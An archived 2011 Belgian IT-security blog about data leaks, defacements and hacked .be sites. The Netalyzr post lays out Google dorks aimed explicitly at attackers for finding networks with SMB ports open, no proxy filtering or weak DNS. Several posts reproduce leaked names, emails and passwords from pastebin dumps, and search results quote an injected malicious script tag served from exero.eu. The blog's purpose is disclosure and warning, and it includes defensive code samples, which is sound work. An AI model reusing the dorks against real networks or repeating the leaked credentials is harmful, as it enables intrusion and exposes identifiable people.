08/05/2011

how to find the same defacement with google image search

this is an example

http://www.google.com

well, we first searched for "hacked", or you type in the email address, a typical name or whatever is interesting and unique in the defacement

and if that ain't possible you just search for the domain name in Google Images to get all the images on the website

then you drag and drop the image into the search box, click on the camera and then you have the result

- but it isn't complete: it is just a limited snapshot of what Google itself found at a certain moment

Permalink | |  Print |  Facebook | | | | Pin it! |

netalyzr: it is not the intent but the content that is important

on the same day that several reports are published about hidden tracking by marketing firms for big sites, we find that a tool promoted by privacy activists to check the limitations of our privacy on the networks of our ISP is itself leaking so much information online that it becomes a big security problem.

it was found by chance and cert.be has been contacted

but what the hack was going through their minds

the minds of the analyzers themselves, who didn't think for one moment about the security of the information and the vulnerabilities it could produce, who didn't start from the privacy of the users, and so produced the worst kind of security software, which, if it were commercial, would have been lambasted all over the web

the minds of the security activists who didn't check things, even the most simple ones, to be sure that if they were going to defend, promote or accept privacy-control software, it was secure and private enough to handle all the information

good intentions aren't enough


netalyzr for home computers: please give all your info to the world

this is the full process of the analysis, with all the connections and servers that are used

http://www.scribd.com/doc/61674312/netalyzr-icsi-berkeley...

so what about computers that are not behind a NAT and a supposed network security policy

what information do they lose through the publication of their test online

so we will now look at a Telenet home computer for which the following information has been published online

http://netalyzr.icsi.berkeley.edu/transcript/id=3210a1cd-28085-1dbd181d-93d4-4a07-9b14/side=server

it is totally different from the network analysis

in some you can see the version of the Java runtime (exploit, anyone?)

then we need the identification of the PC (even if they use DHCP)

004,171 test-2| IP: 0:0:0:0:0:0:0:1
004,171 test-2| hostname: 0:0:0:0:0:0:0:1
004,172 test-2| IP: 127.0.0.1
004,172 test-2| hostname: 127.0.0.1
004,172 test-2| Display name: net0
004,172 test-2| Display name: net1
004,172 test-2| Display name: net2
004,172 test-2| Display name: ppp0
004,172 test-2| Display name: eth0
004,172 test-2| Display name: eth1
004,173 test-2| Display name: eth2
004,173 test-2| Display name: ppp1
004,173 test-2| Display name: net3
006,443 test-2| IP: fe80:0:0:0:593e:59bb:e402:a1ce%10
006,443 test-2| hostname: fe80:0:0:0:593e:59bb:e402:a1ce%10
006,444 test-2| IP: 192.168.0.233
006,444 test-2| hostname: 192.168.0.233
006,444 test-2| Display name: net4
006,445 test-2| IP: fe80:0:0:0:10f0:3777:3f57:ff78%11
006,445 test-2| hostname: Ben-PC
006,446 test-2| Display name: eth3
006,447 test-2| IP: fe80:0:0:0:6d0b:856b:fdea:f245%12
006,447 test-2| hostname: fe80:0:0:0:6d0b:856b:fdea:f245%12
006,448 test-2| IP: 192.168.0.135
006,448 test-2| hostname: 192.168.0.135
006,448 test-2| Display name: net5
006,786 test-2| IP: fe80:0:0:0:dd63:71f4:725d:7ae3%13
006,786 test-2| hostname: fe80:0:0:0:dd63:71f4:725d:7ae3%13
006,786 test-2| Display name: net6
006,786 test-2| Display name: net7
006,786 test-2| Display name: net8
007,130 test-2| IP: fe80:0:0:0:0:5efe:c0a8:87%16
007,130 test-2| hostname: fe80:0:0:0:0:5efe:c0a8:87%16
007,470 test-2| IP: fe80:0:0:0:0:5efe:c0a8:e9%16
007,470 test-2| hostname: fe80:0:0:0:0:5efe:c0a8:e9%16

we have everything

okay let's go on now to the browser

021,920  test-8| Line 4:Header: User-AgEnt: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
021,920  test-8| Line 5:<P>
021,920  test-8| Line 6:Header: AcCept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
021,920  test-8| Line 7:<P>
021,920  test-8| Line 8:Header: AccEpt-Language: nl,en-us;q=0.7,en;q=0.3
021,920  test-8| Line 9:<P>
021,921  test-8| Line 10:Header: AccEPt-Encoding: gzip, deflate
021,921  test-8| Line 11:<P>
021,921  test-8| Line 12:Header: AccEPT-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

what more have we got
unrestricted DNS (never heard of OpenDNS, Telenet?)
accepts malformed packets (filtering attacks, anyone?) probably also no good firewall on the PC

I also need to know what kind of files arrive at the computer without being checked (they test with a torrent and an mp3 and
really a

025,483 test-15| Fetching file eicar-standard-av-test-file.com of length 68
025,483 test-15| query is GET http://n1.netalyzr.icsi.berkeley.edu/file/id=43ca253f-28949-dd40078d-dc0a-4a56-8281/name=eicar-standard-av-test-file.com HTTP/1.1
025,590 test-15| connected to n1.netalyzr.icsi.berkeley.edu:80 in 107 ms
025,998 test-15| HTTP headers received: Server Date ICSI-Client-Addr Content-Type Content-Length Set-CooKIE Last-Modified
025,998 test-15| Connection header is null
025,998 test-15| Content length is: 68
025,998 test-15| Got all content
025,998 test-15| Got response code 200, length is 68
025,998 test-15| Header 0 is Server
025,998 test-15| Header 1 is Date
025,998 test-15| Header 2 is ICSI-Client-Addr
025,998 test-15| Header 3 is Content-Type
025,998 test-15| Header 4 is Content-Length
025,998 test-15| Header 5 is Set-CooKIE
025,998 test-15| Header 6 is Last-Modified
025,998 test-15| Test file fetched successfully

a test file for antivirus software, and if the test file is fetched successfully this means that .... there is no good antivirus, because the file
has been made to test for the presence of a working antivirus (which should have blocked it)

and then I need more information about the ports, but that I have for each port

so I know the browser, the IP address, the open ports, whether a good antivirus is installed, the presence of security installations by the provider
(none, as far as it seems - I thought they said they had done so after the new law on telecommunication, but maybe I have
been dreaming)

this is good enough for most attackers I suppose




netalyzr: the best free security test tool for network people and the worst data leakage

What they should have done

* have a real full example file

* have a privacy policy

* do not publish the data online but send it by mail or something like that

* do not publish all the data in the report - generalize it - or send the detailed technical report only to the people responsible for the network or host (after signing an agreement online etc....)

* contact Google to empty their cache

* destroy all online information from networks and computers
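As an added example (not the page's or Netalyzr's own code), here is what the "generalize it" step in the list above could look like when applied to transcript lines like the ones quoted earlier: private and link-local addresses, the machine name and the browser versions are replaced by generic labels before anything is published, and a summary tells the publisher what the raw transcript would have exposed. The sample transcript is constructed from the quoted lines, and the regular expressions assume the `TIME test-N| text` layout shown there.

```python
import ipaddress
import re

# Constructed sample, modelled on the transcript lines quoted above (not a real capture).
SAMPLE_TRANSCRIPT = """\
004,172 test-2| IP: 127.0.0.1
004,172 test-2| hostname: 127.0.0.1
006,444 test-2| IP: 192.168.0.233
006,444 test-2| hostname: 192.168.0.233
006,445 test-2| IP: fe80:0:0:0:10f0:3777:3f57:ff78%11
006,445 test-2| hostname: Ben-PC
006,446 test-2| Display name: eth3
021,920 test-8| Line 4:Header: User-AgEnt: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
021,920 test-8| Line 8:Header: AccEpt-Language: nl,en-us;q=0.7,en;q=0.3
"""

# "004,172 test-2| <body>": timestamp, test number, then the logged text (assumed layout)
LINE_RE = re.compile(r"^(?P<ts>\d{3},\d{3})\s+(?P<test>test-\d+)\|\s*(?P<body>.*)$")
# the two fields that identify the machine inside the local network
KEYVAL_RE = re.compile(r"^(?P<key>IP|hostname):\s*(?P<val>\S+)\s*$")
# the echoed request header; the header names have mixed casing in the transcript, hence IGNORECASE
UA_RE = re.compile(r"^(?P<prefix>.*?Header:\s*User-Agent:\s*)(?P<ua>.*)$", re.IGNORECASE)


def classify_address(text):
    """Return a generic label for an address literal, or None if text is not an address."""
    bare = text.split("%", 1)[0]  # strip an IPv6 scope id such as %11
    try:
        ip = ipaddress.ip_address(bare)
    except ValueError:
        return None
    if ip.is_loopback:
        return "<loopback>"
    if ip.is_link_local:
        return f"<link-local IPv{ip.version}>"
    if ip.is_private:
        return f"<private IPv{ip.version}>"
    return f"<public IPv{ip.version}>"


def generalize_user_agent(ua):
    """Keep the product family, drop the OS string and the exact versions."""
    ua = re.sub(r"\([^)]*\)", "(platform redacted)", ua)
    return re.sub(r"/\d[\w.]*", "/x", ua)


def generalize_line(line):
    """Return the transcript line with identifying values replaced by generic labels."""
    m = LINE_RE.match(line)
    if not m:
        return line
    body = m.group("body")
    kv = KEYVAL_RE.match(body)
    if kv:
        label = classify_address(kv.group("val"))
        if label is None:
            # not an address literal, so a machine name like the one in the transcript
            label = "<hostname redacted>"
        body = f"{kv.group('key')}: {label}"
    else:
        ua = UA_RE.match(body)
        if ua:
            body = ua.group("prefix") + generalize_user_agent(ua.group("ua"))
    return f"{m.group('ts')} {m.group('test')}| {body}"


def generalize_transcript(text):
    return "\n".join(generalize_line(line) for line in text.splitlines())


def exposure_summary(text):
    """Count what the raw transcript exposes, per category, for a pre-publication review."""
    counts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kv = KEYVAL_RE.match(m.group("body"))
        if kv:
            key = classify_address(kv.group("val")) or "<hostname redacted>"
        elif UA_RE.match(m.group("body")):
            key = "user-agent"
        else:
            continue
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    print(generalize_transcript(SAMPLE_TRANSCRIPT))
    print(exposure_summary(SAMPLE_TRANSCRIPT))
```

Interface names and the Accept-Language header are left untouched here; whether they count as identifying depends on the network, which is exactly the judgement the list above asks the publisher to make.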

after having read all this (and more to come) it is incredible that privacy activists didn't include any "privacy preserving" methods in their report or website

the online privacy blogs and activists say that when you go to http://netalyzr.icsi.berkeley.edu/ you can discover what is blocked or captured by the ISP or other network interference between you and the internet

and it is true: when you see the report after the Java applet has been installed on your computer, it is just amazing

network people and security people would just love to have that information at hand on one screen

as a network person you will need to read a lot of paper to understand it fully

but as a security person you will see immediately what the machine is allowed to do through the firewall and what the role of the proxy and other security installations is (you will see how 'exposed' the computer is, which ports are open and whether the local IP address is known or not)

this is a sample report http://netalyzr.icsi.berkeley.edu/restore/id=example-sess...

then we look at the FAQ http://netalyzr.icsi.berkeley.edu/faq.html

there is no privacy policy, euh

okay, let's ask Google

Google Dork  site:netalyzr.icsi.berkeley.edu/  NAT detected

so these are computers that are behind a network of a company or institution and we have about 2300 full reports online

First their NAT address is discovered and published "Your global IP address is 75.173.65.226 while your local one is (none of your business). You are behind a NAT."

secondly you have all the ports that are open between the firewall and the specific client

so take for example (based on the example report) that we want to attack port 139

site:netalyzr.icsi.berkeley.edu/  NAT detected "access to remote NetBIOS servers (port 139) is allowed"

yes, we now have about 773 networks that allow direct communication between their hosts and port 139, and where the security people haven't read anything about securing a network in the last 10 years.

If they leave that port open you can assume that you can do a whole lot of other things

so let's go a bit further and use not only port 139 but also port 445 for a full attack

site:netalyzr.icsi.berkeley.edu/  NAT detected "access to remote NetBIOS servers (port 139) is allowed" AND "access to remote SMB servers (port 445) is allowed"

as we thought, most of them allow both

but you can extend the Google dork with any port or service in the example that is being monitored and that you want to use. Some networks won't give all the information, so you may have to test it.

okay, let's now also limit the country. This is not perfect, but it can be done because the report sometimes also gives the ISP's hostname for the IP address, and in that name you will sometimes find the country domain extension

the best way to do that is by using the name of the ISP

dslextreme.com for example (4 networks): dslextreme.com site:netalyzr.icsi.berkeley.edu/ NAT detected

You can also work with IP ranges, in which case you only use the first octets

hey, there is even more crazy stuff you can discover which is NOT in the example file (which is by the way not a real example file at all, because the tests are much more comprehensive (and intrusive) than the more or less 'innocent' example file shows (and misleads in a way, sorry guys). Transparency.

these are some of the ports that are checked and can be dorked

if you want to see if others are tested and found you just add "port xxx)" to the dork

Direct TCP access to remote OpenVPN servers (port 1194) is allowed.
Direct TCP connections to remote PPTP Control servers (port 1723) 
Direct TCP access to remote TOR servers (port 9001) is allowed.
for UDP there are also interesting dorks to make

The applet was able to send fragmented UDP traffic.

The applet was able to receive fragmented UDP traffic.

Direct UDP access to remote DNS servers (port 53) is allowed.
Direct UDP access to remote NTP servers (port 123) is allowed.
Direct UDP access to remote OpenVPN servers (port 1194) is allowed.
Direct UDP access to remote MSSQL servers (port 1434) is allowed.
so imagine what kind of dorks you can make with a combination of open tcp and open udp ports to infiltrate and inject and to extract
Even better on some networks you get a real internal traceroute - no joke
this is an example (there are 360 traceroutes of internal networks)
ip-10-114-184-3.ec2.internal (0 ms)
ip-10-1-50-41.ec2.internal (0 ms)
ip-10-1-34-78.ec2.internal (0 ms)
216.182.232.70 (0 ms)
*
*
*
*
dca-edge-18.inet.qwest.net (8 ms)
dcp-brdr-03.inet.qwest.net (6 ms)
xe-9-1-0.edge1.washington4.level3.net (4 ms)
ae-71-71.ebr1.Washington1.Level3.net (4 ms)
ae-91-91.ebr1.Washington1.Level3.net (4 ms)
ae-7-7.ebr3.Dallas1.Level3.net (36 ms)
ae-7-7.ebr3.Dallas1.Level3.net (35 ms)
ae-73-73.csw2.Dallas1.Level3.net (36 ms)
ae-3-80.edge3.Dallas1.Level3.net (36 ms)
WINDSTREAM.edge3.Dallas1.Level3.net (37 ms)
h8.254.213.151.static.ip.windstream.net (35 ms)
h8.254.213.151.static.ip.windstream.net (37 ms)
h6.254.213.151.static.ip.windstream.net (42 ms)
h71.254.213.151.static.ip.windstream.net (43 ms)
h87.17.213.151.static.ip.windstream.net (47 ms)
h115.16.213.151.static.ip.windstream.net (51 ms)
sedivy.com (58 ms)
you can in fact check all these things (put them between " " in your Google dork, with AND if you want to see open ports, and with a - if you don't want to deal with a proxy blocking your online attack scripts)

yes, you can filter out all the networks that have no proxy to filter those web-based attacks

if these filters are not present you get these results (for about 1000 networks here)

Address-based HTTP proxy detection : OK
Content-based HTTP proxy detection : OK
HTTP proxy detection via malformed requests : OK
Filetype-based filtering : OK
HTTP caching behavior : OK
JavaScript-based tests : OK
OK here means that there is NOTHING stopping you, even with malformed packets, that there is NOTHING in between, that the route is all clear to go, attacker
and if you want to be sure of even less security, add -OpenDNS (only 54 networks here use it, so no great loss) and of course those that have no DNSSEC ("It does not validate DNSSEC")
but you can also check for open or insecure DNS servers
you can try this: "DNS resolver port randomization (?): Danger" for DNS poisoning; there are 11 victims here
more to come
oh, you thought this was all (wait for this .....)
                            


08/04/2011

which .be site got defaced the most in the last years

infometeo.be and its other sites

again twice in the insecure .be sites today

and many times in the zone-h.org lists

running IIS 6


forum VT4 (television station) overwhelmed by spammers

Google dork: site:http://forumvt4.sbsbelgium.be

official

Forum SBSBelgium - VT4 & VIJFtv - powered by vBulletin

forumvt4.sbsbelgium.be/ - Cached

Forum for programmes on VT4 and VIJFtv, company SBSBelgium.

in the last month 819 spam postings according to Google

Prednisone pills online- Cheap buy Prednisone in Salem - Forum ...
forumvt4.sbsbelgium.be › Forum VT4 › VT4 Website - Cached
1 post - 1 author - Last post: 5 days ago
Prednisone pills online- Cheap buy Prednisone in Salem VT4 Website.
Best price for Heart Shield in the internet - Forum SBSBelgium ...
forumvt4.sbsbelgium.be › Forum VIJFtv › Mooi en Meedogenloos - Cached
1 post - 1 author - Last post: 6 days ago
Cheapest Heart Shield online - Buy Without Prescription · Heart Shield · Heart Shield is a 100% natural supplement used to help treat heart diseases and to ...
Rave (Energy and Mind Stimulator) Die Apotheke für Deutschland ...
forumvt4.sbsbelgium.be › Forum VT4 › Lost - Cached
1 post - 1 author - Last post: 6 days ago
Rave (Energy and Mind Stimulator) Die Apotheke für Deutschland, die niedrigen Pr Lost.
fluoxetine without rx medications ,real buy fluoxetine no ...
forumvt4.sbsbelgium.be › ... › De Jeugd Van Tegenwoordig - Cached
1 post - 1 author - Last post: 6 days ago
fluoxetine without rx medications ,real buy fluoxetine no prescription online De Jeugd Van Tegenwoordig.
Buy Lasix Drugs | Best price for Lasix - Forum SBSBelgium - VT4 ...
forumvt4.sbsbelgium.be › Forum VT4 › De Smaakpolitie - Cached
1 post - 1 author - Last post: 6 days ago
Buy Lasix Drugs | Best price for Lasix De Smaakpolitie.

how to check

Google your own forum: site:nameforum.domainextension

if you have too many results, add Apotheke, prescription, "best price" or "cheap buy"

You can also ask Google and others in your robots.txt not to index your forum, so that it can't be used to insert links that will be used elsewhere as redirects
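The self-check described above, written out as a small triage script (an added example, not code from the page or from vBulletin): it scores thread entries with the spam terms the post names plus the "1 post - 1 author" pattern visible in the listing, and builds the site: query for your own forum. The entries are constructed; the spam titles are copied from the listing above, the Dutch titles are made up to stand for legitimate threads.

```python
# Spam markers the post tells you to add to the search; "without rx" and "pills online"
# are taken from the titles in the listing above.
SPAM_TERMS = ["apotheke", "prescription", "best price", "cheap buy", "without rx", "pills online"]

# Constructed entries modelled on the search listing above.
SAMPLE_THREADS = [
    {"title": "Prednisone pills online- Cheap buy Prednisone in Salem", "posts": 1, "authors": 1},
    {"title": "Best price for Heart Shield in the internet", "posts": 1, "authors": 1},
    {"title": "Rave (Energy and Mind Stimulator) Die Apotheke für Deutschland", "posts": 1, "authors": 1},
    {"title": "Wie kijkt er vanavond naar de finale?", "posts": 14, "authors": 6},
    {"title": "Fout in de ondertiteling van Lost, aflevering 3", "posts": 3, "authors": 2},
]


def spam_score(thread):
    """One point per spam term in the title, one more for a drive-by single-post thread."""
    title = thread["title"].lower()
    score = sum(1 for term in SPAM_TERMS if term in title)
    # every spam hit in the listing reads "1 post - 1 author": a throwaway account that posted once
    if thread["posts"] == 1 and thread["authors"] == 1:
        score += 1
    return score


def flag_spam(threads, threshold=2):
    """Return the titles that reach the threshold; a single signal alone is not enough."""
    return [t["title"] for t in threads if spam_score(t) >= threshold]


def self_check_query(forum_host, terms=SPAM_TERMS):
    """Build the 'Google your own forum' query from the post, narrowed with the spam terms."""
    quoted = " OR ".join(f'"{t}"' if " " in t else t for t in terms)
    return f"site:{forum_host} ({quoted})"


if __name__ == "__main__":
    for title in flag_spam(SAMPLE_THREADS):
        print("spam?", title)
    print(self_check_query("forumvt4.sbsbelgium.be"))
```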


08/03/2011

what is the hacked site www.muziekcentrum.be

so they have lost the user accounts of at least 2 databases, which are published on the web

this is a few hours ago

they are still online

they have no message on their site

more than a hundred accounts were published online (password, email, .....)

it is a site that is subsidized by the Flemish administration to organize the musicians and the music industry, and has a database of who is who in the bizz and the scene

so if they don't take any measure, I can say that someone plays punk music instead of jazz and change telephone numbers, and if they use the same passwords for their email messages I can confirm the changes to the correspondents, saying I am going to live in Thailand for a while because I am sick of Belgian politics (and send it to the press so that it makes headlines)

get the picture?

secure your website database for any reason, but the best reason is your users

out of respect


Belgian .be oscommerce sites still infected

it is open source

for a real webshop

with open doors to inject redirect links to malware

and Google only indicates a few infected pages (it should maybe block the whole site instead of one page that it finds and another it overlooks (and indicates as safe))

  1. Fast Spirit<script src=http://exero.eu/catalog/jquery.js></script>
     fastspirit.be/oscommerce/catalog/index.php?cPath=489
     This site may harm your computer.
     Echappement V.W Oval 149,50€, Echappement V.W. double rond 149,50€, Scirocco ...
  2. CIS Computers<script src=http://exero.eu/catalog/jquery.js></script>
     www.ciscomputers.be/Shop/index.php?cPath=88_16_33
     Accessoires (13). boitier multimedia (3). cables · Chargeurs pc portable (11). Composants de PC & de pc portabl (76). - alimentations (3) ...
  3. BKCP-Powerplus Webshop<script src=http://exero.eu/catalog/jquery ...
     www.bkcp-powerplus.be/bkcppowerplus/shop/catalog/index.php?...
     BKCP-Powerplus Webshop<script src=http://exero.eu/catalog/jquery.js></script>

adapt the search term to your wishes: "http://exero.eu/catalog/jquery.js" site:be
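A check a shop owner can run over their own pages instead of waiting for Google to notice (an added example, not code from the page or from osCommerce): it lists every <script src> loading from a host other than the shop's own, quoted or unquoted as in the injected tags above, and reports whether the tag sits inside <title>, where no legitimate script belongs. The HTML fragment is constructed after the results above; the own_host and allowlist values are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed page fragment modelled on the results above: the shop's <title> carries an
# injected remote script tag with an unquoted src, next to the shop's own and one analytics script.
SAMPLE_HTML = """<html><head>
<title>Fast Spirit<script src=http://exero.eu/catalog/jquery.js></script></title>
<script type="text/javascript" src="/oscommerce/catalog/shop.js"></script>
</head><body>
<script src="https://www.google-analytics.com/ga.js"></script>
<h1>Echappement V.W Oval 149,50 EUR</h1>
</body></html>"""

# <script ... src=VALUE>, with VALUE double-quoted, single-quoted or bare (the injected form)
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)'|(?P<uq>[^\s>]+))",
    re.IGNORECASE,
)
TITLE_RE = re.compile(r"<title\b[^>]*>.*?</title>", re.IGNORECASE | re.DOTALL)


def script_sources(html):
    """Return (src, offset) for every external script tag in the document, in page order."""
    found = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group("dq") or m.group("sq") or m.group("uq") or ""
        found.append((src, m.start()))
    return found


def find_foreign_scripts(html, own_host, allowlist=()):
    """List script sources loaded from hosts that are neither the shop's own nor allowlisted."""
    own_host = own_host.lower()
    allowed = {h.lower() for h in allowlist}
    title_spans = [(t.start(), t.end()) for t in TITLE_RE.finditer(html)]
    findings = []
    for src, pos in script_sources(html):
        host = urlparse(src).hostname  # None for a relative path, i.e. served by the shop itself
        if host is None:
            continue
        if host == own_host or host.endswith("." + own_host) or host in allowed:
            continue
        findings.append({
            "src": src,
            "host": host,
            # a script tag inside <title> is never legitimate markup: a strong injection signal
            "in_title": any(start <= pos < end for start, end in title_spans),
        })
    return findings


if __name__ == "__main__":
    hits = find_foreign_scripts(SAMPLE_HTML, "fastspirit.be", allowlist=("www.google-analytics.com",))
    for f in hits:
        where = "inside <title>" if f["in_title"] else "in body"
        print(f"foreign script {f['src']} from {f['host']} ({where})")
```

Protocol-relative sources (//host/file.js) resolve to a hostname too, so they are checked like absolute ones; only paths without a host are taken as the shop's own.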


net-bashers attack 'silly belgians' admins ? more to come ?

Net-Bashers
 
this feed is followed by twitter.com/mailforlen (I only follow really interesting hacker feeds; the hundreds of others are in the lists you can follow according to subject)
no opinion - just informing


two belgian websites (still hacked)

http://antwerpdiamondcity.be/

http://www.namurois.be/blog/

 

it is a holy holiday


another Belgian site hacked and leaked: flandersmusic

Net-Bashers: flandersmusic - Pastebin.com

pastebin.com/tWs7CDCu

4 hours ago - marleen vermeir abc123 vermeir MARLEEN marleen.vermeir1@telenet.be. mdurie hcts%iu? ... PeterVB Section21 Van Bogaert Peter liquidprodukts@telenet.be ...

the pirate ship Net-bashers is sailing the Belgian seas, hijacking boats and looting all the accounts to be published for all to see

this help ship has sent the Belgian CERT harbor all the technical info they need (which is also published here) to follow this situation up to the minute

Maybe the inspection ship from our Privacy commission should sail out for some inspection rounds .....

maybe the FCCU will have to send out ships to protect our fleet :)

the risk is high that more is to come

off to the sea again  :)


is wordpress becoming the next joomla (plus vulnerability hype)

Joomla is the kind of software model in which anybody can write whatever add-on or script and include it in whatever version of your central software, without any quality or security control or maintenance

today another zero-day vulnerability attack has been found against one of the thousands of free scripts and modules that are floating around the web

here is some expert advice (and that counts for all the open software libraries)

Here are a few things that if put into practice, will help you minimize the risk of getting exploited:

  1. Keep your themes and plugins updated – #1 cause of malware infections and hacks independent of any platform!
  2. Only download from reputable sources (WordPress.org).
  3. Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework
  4. Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
  5. Don’t just disable, remove any software that you’re not actively using. Just because it’s not active doesn’t mean it’s not vulnerable

Sucuri WordPress Check

Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP Check


http://blog.sucuri.net/2011/08/timthumb-php-security-vuln...

on the other side, if you do the following Google search

allinurl:timthumb.php -not found

which means all the sites that actually use this tool in a way that you can find easily, but without all the sites that have put logical restrictions on the ability of the script to upload pictures, then you will see that we are only left with a handful of sites

some vulnerability research is only hype

but that changes nothing about the general management remark, nor about the list of things to do with any software package you use


ebay userdata leak : rumor or trade secret

https://twitter.com/#!/anonadamh

first he tweeted on the 28th of July

Googling and searching NYT gives no results however
Now he says - because no one is finding any info
He also says that it was through an open FTP server, that it was 500 Giga and that there was account information in it

Either it is true, and eBay is running enormous risks because they can be fined in US courts for millions and their stock and online business will falter, because all trust will be gone since the people concerned weren't informed.
Or it is a black op by antisec, or an agent provocateur (or should we call them a cyber-provocateur) trying to get antisec to spread false rumors (as with Topiary using PayPal)
I can't believe that eBay has that information on an open FTP server and that personal information wasn't encrypted or protected. But I hardly believed that Sony could be hacked the way it was. But in the US the laws and controls are stronger and the penalties bigger.
so I would say two things
* shut up or prove your case
* if you don't monitor the web 2.0 environment you don't know shit about your company or brand
 
 
 
 
 


ITsecurity activists also need some lulz on the high seas

Lulz wanted to have some fun in the Anonymous world of declarations, discussions and heated exchanges between different factions

so he started lulzsec antisec, just to show by some social engineering, hacking and penetration techniques that the security of even the biggest digital enterprises is sometimes just embarrassing

so why not the security people

well instead of reporting a securitybreach to the securitypeople of the CERT

I say now

I bring you the wounded and the dead boats to your harbor, captain

I have found them on the high wild seas of the Internet where storms are raging

They should be fixed before those boats can sail out again or they should buy a new boat

I am just a red cross ship going out to help and I do not participate in the battles on the high seas

 

and maybe I should also say

please keep those small defenseless boats from sailing on the high seas

I hate bringing them back in after a few weeks on the sea

and I am also tired of bringing each time the same boats back

(and you probably of having to see them sail out again the way they were brought in)

 

sounds more fun

and yes having a whiskey and a ball and a sing-a-long :)

and girlz or our wives and our kids playing around and a bbq or a banquet :)

before we go out on the high seas again - looking to help


leaked: Belgian jazz meeting (passwords and emails)

Net-Bashers: Belgian jazz meeting - Pastebin.com

pastebin.com/ZP2bZ7ph

9 minutes ago - vermeir marleen vermeir abc123 MARLEEN marleen.vermeir1@telenet.be ... bastiaensen riabastiaensen basti64 ria ria.bastiaensen@telenet.be ...

 

will Belgian and Dutch sites understand now that they are not spared from the leak attacks on the internet

that defacing a site is so old-school and that this newer bunch just wants to leak the most important information it finds, to embarrass you, and that you will have to contact them, get your site off the net and get your things in order once and for all

ps have you seen how short and stupid these passwords are?

thinking about password rules for your accounts is no luxury

SQL injection (what else) or a weak admin password (take 12 characters)

if you are on the list

* I hope you don't use that password elsewhere

* you will receive more spam, undetected viruses and scams

more than 3 million emails and accounts have been breached in the last months, and at this rate ....


#topiary or lulzsec was not using paypal (online black ops)

the virtual world is a world of make believe and duping especially if you are on the borderline or totally in illegality

so you may not believe what you see, but have to go a bit further

except that even journalists don't check the facts or the sources before they publish, retweet or say something

together with Twitter and the other social networks you can set up black-op operations quite easily, cheaply and effectively (even if it is discovered, you will always have convinced enough people and left some doubt with the rest). The goal of a black op or psy op is just that. And you will never be able to rectify it with the same force and speed.

so there are tweets going around that lulzsec would have used PayPal while there is a whole campaign against PayPal going on (and at least 40.000 people (but it could be tenfold) have closed their accounts)

and if you know you are the target of psy-ops, then you have to be smarter than that

and in Anonymous there are some very smart guys and girls

"lulz: http://pastebin.com/EcNCwaEu

the whole conversation is staged. we knew that someone would leak it so we made everything up.
we thought that it would reach th3j35t3r and he would leak it.
proof is the plaintext of the “target-hash” ->  8bb4cdc8f511ad386e723f298c9b3c39 = ‘th3j35t3r got trolled’
boredom o/

–alex"

 

so this means that they have seen the fabricated IRC conversation (where an anti-lulzsec impersonated Topiary) and decided to leak it themselves, but with a hidden tracker. So the 'anti-lulzsec' operators on Twitter read it, jumped on it without thinking and re-leaked it

it also means that you have to be very careful and have to check the MD5 of the personae in the IRC forums because you never know who the ghost is at the other side.


08/02/2011

#refref tool: things to think about already

#refref is the tool that Anonymous will launch mid-August (for those who pay) and mid-September for the rest of us

the security people will hope that enough firms pay to get the tool in mid-August, so they can release patches to defend their systems (databases) and release workarounds or identifiers for traffic interceptors and cleaners

but there are also a few things one could think about - especially if you are a high value target or logical target

* resource planning: the attack brings down an unpatched and unprepared machine (like pastebin.com) in about 42 seconds. This means that you need real-time monitoring of the resources of your machines and immediate automatic responses if those resources are spiraling into a hurricane (this could be to drop the connection or the process altogether)

* traffic interceptors and defenders: you need a box in front of your installation that will drop or analyze traffic to your network or servers, and that is capable of quickly adding IDs so you can stop this kind of traffic before it reaches the server(s).

* alternative sites: most of the sites today have databases and interactive functions, but if you have a static website you could divert the traffic to that site when it has the characteristics of an attack. It could also make it easier to stay 'online' if you are under attack and to inform your contacts and customers about the technical situation and your time planning. It also means that you need a clean backup and possibly another alternative hoster (possibly more expensive but more secure) to take over the hosting when you are actually under this kind of attack.

* logging: the tool itself doesn't protect the attacker, who is solely responsible for his anonymity. This means that on one side you will need to keep the logging (and send it immediately to another resource outsiders can't reach) and on the other side you will need an immediate alerting system if some special kinds of logs are seen.

* sql injection: the goal is also to do an SQL injection and to extract information. Checking your website against all kinds of SQL injection is the best way to prepare and protect yourself against one of the most popular attacks.

* encryption: the less information you have online, the better, because there is less to invest in keeping it secure. But that is on the condition that you have protected it with rights (like Data Leakage Prevention) and by encryption (more than MD5)

* patching: the tool will include vulnerabilities and exploits, so it means again that machines, OS and all the different code packages have to be in their most recent version and be patched whenever needed. You will need a patching process in place, because otherwise it will not be possible to apply all the patches that may be launched in the coming weeks and months because of this tool.

more to come if more information is known


the arrest of Lulzsec-Topiary and questions

First, the reprisals are already happening now that it is clear that a major Lulzsec operator has been arrested. It is not clear yet how many will follow and what the impact will be, but it is clear that if you are linked in any way as an operator with this arrest, you will have to keep it absolutely secret or close down as many internet activities as possible for the time being.

secondly, this doesn't mean the end of Lulzsec, because Lulzsec is a certain idea of hacking: a combination of the 4chan way of having fun doing incredible things and making people look absolutely stupid, and giving some political or IT security manifesto reason to it. Before Lulzsec, Anonymous was becoming boring to the kids on the block; thanks to Lulzsec they are cool again, doing cool stuff.

thirdly, about 750.000 authentic logins were found on the computers (he used more than 40 virtual instances on his machine), but there is no information available about the rest of the loot that was going to be published soon (1 Giga NATO, 8 Giga European stuff, Italian cyberpolice, Sun 4 Giga emails, ....) and it is not clear yet if there are other copies of that stuff somewhere out there. It also means that Topiary has some room for a settlement, because nobody is interested in him; the only thing going through the mind of every security person is: how do we get that stuff back in the can? And if a deal is the fastest way, so be it. Those who want to teach a lesson (with all the risks of new reprisals and leaks) will probably take a back seat (or even have to leave the room) because there are a lot of national security interests involved.

